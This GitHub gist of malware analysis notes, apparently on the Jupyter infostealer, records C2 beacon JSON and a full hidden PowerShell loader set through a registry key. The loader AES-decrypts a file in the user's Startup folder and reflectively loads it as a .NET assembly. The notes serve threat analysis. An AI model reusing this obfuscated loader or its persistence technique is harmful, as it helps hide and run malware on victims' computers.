Skip to content

Instantly share code, notes, and snippets.

@silence-is-best

silence-is-best/gist:efebd9820f42c5a85b395a787bb9d5c8

Created May 12, 2022 17:57
Show Gist options
  • Save silence-is-best/efebd9820f42c5a85b395a787bb9d5c8 to your computer and use it in GitHub Desktop.
Save silence-is-best/efebd9820f42c5a85b395a787bb9d5c8 to your computer and use it in GitHub Desktop.
Download ZIP
Jupyter notes
Raw
gistfile1.txt
c2 comms info:
{"status": "idle", "uniq_hash": "b2g/9HDXG/SqaQ=="}
{"action":"ping","hwid":"Q9QXIUFLM61YIIEJX2702ICY096GL89B","pc_name":"JONATHAN-PC","os_name":"Win 7","arch":"x64","rights":"+","version":"MAY_3.2/B","workgroup":"? | ?","dns":0,"protocol_version":2}
regkey set:
powershell -windowstyle hidden -command "$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('AH9003f1pgWZl1bvey0sa6wYF9VAKpokDmiPEo9mEkc=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcSm9uYXRoYW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxqSkxnY2hORFlWWEhEV1RYamxRZlJSb0tocWYud2hYUFF1Skh2VUJFUg=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[rbavXKsXaHtcCIBRtvgmZmoJ7N5fk9n_hasQQmQM9.DBUDOKnmywFSZ]::p8OCwSsJRtmCPj6inmZE42bA4j8qe2gtwfWHNQgI();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment